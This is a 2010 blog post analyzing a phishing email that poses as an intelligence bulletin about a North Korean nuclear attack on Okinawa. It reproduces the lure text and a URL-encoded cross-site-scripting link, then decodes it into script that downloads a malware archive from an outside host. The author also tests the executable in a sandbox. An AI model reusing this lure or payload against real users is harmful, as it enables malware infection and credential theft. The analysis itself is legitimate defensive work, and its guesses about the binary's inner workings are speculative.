A Short Look into a Phishing Email

Citation: VnutZ, A Short Look into a Phishing Email, OmniNerd.com, 07 March 2010, accessed on 30 September 2014 from http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email
Tags: security, analysis, computing, and cyber

So the other day, I came out of the movie theater and checked my iPhone to see what I missed while being entertained by Alice in Wonderland. In my AKO mail was a curious looking message about North Korea having tested a missile with a nuclear detonation in Okinawa, Japan. The message indicated alerts being made for pending mobilization of military units. WTF?


Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US 
seismographic stations recorded seismic activity in the area of Okinawa Island 
(Japan). According to National Geospatial-Intelligence Agency, Democratic 
People's Republic of Korea has carried out an average range missile attack 
with use of nuclear warhead. The explosion caused severe destructions in the 
northern part of the Okinawa island. Casualties among the personnel of the US 
military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the 
personnel of the services listed below to be ready for immediate mobilization:


CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
 OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE 

DEPARTMENT OF HOMELAND SECURITY:
 OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
 BUREAU OF INTELLIGENCE AND RESEARCH 

DEPARTMENT OF THE TREASURY:
 OFFICE OF INTELLIGENCE AND ANALYSIS 

DRUG ENFORCEMENT ADMINISTRATION:
 OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
 NATIONAL SECURITY BRANCH 

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?
l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69
%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64
%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c
%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74
%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c
%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27
%29%3c%2f%73%63%72%69%70%74%3e%3c%22
________________
Office of the Director of National Intelligence
Washington, D.C. 20511

Naturally not clicking on the link for additional information, I turned to CNN, BBC and Google to confirm I did not miss Japan becoming the world’s only nuclear triple-crown winner. After a cursory search, it appeared Japan was still merely a champion of the nuclear doubleheader. It irritated me though that I was getting these phishing e-mails so I decided to see where they were coming from.

For starters, what were the substitutions hiding? Character strings like %20 represent a hexadecimal value 0x20 (or 20h depending on your preference) that correlate to an ASCII index. Because a URL cannot contain spaces, using character substitutions allows a URL to put %20 in place of the space. It’s typically used by digital miscreants for inserting shellcode in a text string, but can also be used to hide real text as numbers. Consulting a friendly ASCII table with hexadecimal lookups translates the “helpful link” into:


http://www.mod.gov.ge/2007/video/movie.php?l=G&v=">
<a href="http://officialweightlosshelp.org/mf-admin/report.zip">Download </a>
<script>window.open('http://officialweightlosshelp.org/wp-admin/report.zip')</script><"

So I turned to my VirtualBox testing environment from when I wrote What Traffic is on a TOR Relay and accessed the two websites to check them out safely without harming my machine.

30_article_3466_thumb_mod.gov.ge
30_article_3466_thumb_officialweightlosshelp.org

At first glance, it would seem a site in Georgia was being exploited by a cross-site-scripting attack to redirect a viewer to a site that had been previously hacked (or fictitiously created) for file storage. Again, just a first glance would make somebody suspicious of Russian hackers from their previous cyber issues with Georgia and the targeting of American military over AKO. But that’s just speculation – I’m not spending enough time on this to derive evidence to prove or disprove that theory.

Ultimately, all that really matters is the attack is designed to download the file report.zip to the user’s computer. Performing a hex analysis showed it to be a true ZIP file so I used gzip in Linux to decompress it and then looked at it the EXE file with a hex editor.

30_article_3466_thumb_hexdump

The dump of the imports section of the Portable Executable file format reveals what functions this little program uses from various DLLs and Win32 API calls. It’s a little easier to read simply using the command strings report.exe from the command line to dump human readable strings in lieu of finding them amidst the hexadecimal codes.


FormatMessageA
CloseHandle
ReadFile
CreateFileA
ExitProcess
GetFileType
HeapReAlloc
WaitForSingleObject
GetCurrentThread
LoadLibraryA
Sleep
GetStdHandle
HeapAlloc
HeapFree
GetProcessHeap
GetVersion
GetCommandLineA
GetModuleHandleA
KERNEL32.dll
InsertMenuW
LoadMenuW
DrawIconEx
CheckMenuItem
DispatchMessageA
PostThreadMessageA
CharNextExA
LoadStringA
wsprintfA
ExitWindowsEx
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
DrawMenuBar
RemoveMenu
CheckMenuRadioItem
PostQuitMessage
TranslateMessage
DispatchMessageW
USER32.dll
ControlService
CloseServiceHandle
LookupPrivilegeValueA
AdjustTokenPrivileges
SetServiceStatus
SetSecurityDescriptorDacl
RegisterServiceCtrlHandlerA
RegEnumKeyA
RegSetValueExA
InitializeSecurityDescriptor
StartServiceCtrlDispatcherA
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
WS2_32.dll
strcat
strcmp
strchr
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp

Now, without having to bother stepping through the code itself, it should be intuitively obvious to the most casual observer (as my high school physics teacher used to say) that the family of function calls center around privilege checks, registry access, heap calls, service access and the Windows clipboard. Those sound like the functions necessary for heap and buffer overrun exploitation with checks to confirm escalated privilege. That means the bug probably is the result of a race condition, hence the privilege check prior to installing whatever final features it deploys as a Windows service. More than likely, now that the host is part of a BotNet, the remainder of the infection code (probably a rootkit) will then be downloaded from a control center for installation under the newly assumed administrator privileges. No obvious strings existed for network access to obtain the remainder of the code, so its likely the code itself is obfuscated by an internal encryption algorithm – which is fine because I didn’t want to spend time decoding opcode anyway.

Instead, I simply cloned a Windows sandbox in VirtualBox and allowed the infection to install itself while monitoring network activity with WireShark. Running a stock Windows XP without any service packs, I accessed the Georgian Ministry of Defense page with the URL whereupon the script did in fact execute the downloaded report.exe file. WireShark showed name resolution and activity subsequently to updatekernel.com which was the predicted behavior. This server has previously been identified as Chinese in association with the command and control for the Kneber BotNets and other identity theft Phishing activities. Needless to say, this variation did not show up on either Symantec or ClamAV virus scanners which may be a function of encrypting obfuscation or simply an updated variant with a new signature.

30_article_3466_thumb_processmonitor

[Post Edit 1] I actually re-ran this test today and found that apparently the particular link no longer works. It would seem the Georgian Ministry of Defense patched the vulnerability on their website that allowed the link to go through, but I’d saved a copy of the report.exe binary from before. I reverted the Windows XP sandbox to a pre-infection VirtualBox snapshot in order to install Service Pack 2. This was a necessary requirement for installing ProcessMonitor from Mark Russinovich’s fabled SysInternals toolkit. The output above shows the output where processmonitor logged all of report.exe’s activity to the registry and filesystem as it executed. A complete 35 page log is available here for your own perusal, but a lot of activity focuses around browsing the Internet cache, the stored certificates and the cryptologic functions. There was also a series of tests regarding registry accesses and post-clipboard functions. A more thorough analysis with a Win32 debugger to correlate each activity to a code section would, of course, provide a more detailed breakdown. The bottom line, it takes under two seconds for the code to execute, compromise your system and locate information that could be used to impersonate you or clone your credentials.

Let this be just another simple lesson of why you should not click on links sent to you in e-mails. Unless you like being part of a Russian/Chinese/DPRK BotNet and having your identity stolen.

30_article_3466_thumb_ollydbg

[Post Edit 2] I couldn’t resist. My cousin pointed me towards a shareware Win32 debugger called OllyDbg so I went ahead and copied that into my sandbox. The last time I used to do this sort of thing, I was using the old-school DOS debug and Borland debuggers. Once again, I reverted to an older, pre-infection snapshot and loaded the report.exe file. Just as predicted, while the code loaded and OllyDbg performed its heuristic analysis, it indicated the primary code section was likely compressed or encrypted (as any attack should be). I think I’ve found my next source of distraction, I’m not going to be able to resist diving back into the world of reversing code puzzles. 0111 1010 0110 1001

Information This article was edited after publication by the author on 09 Mar 2010. View changes.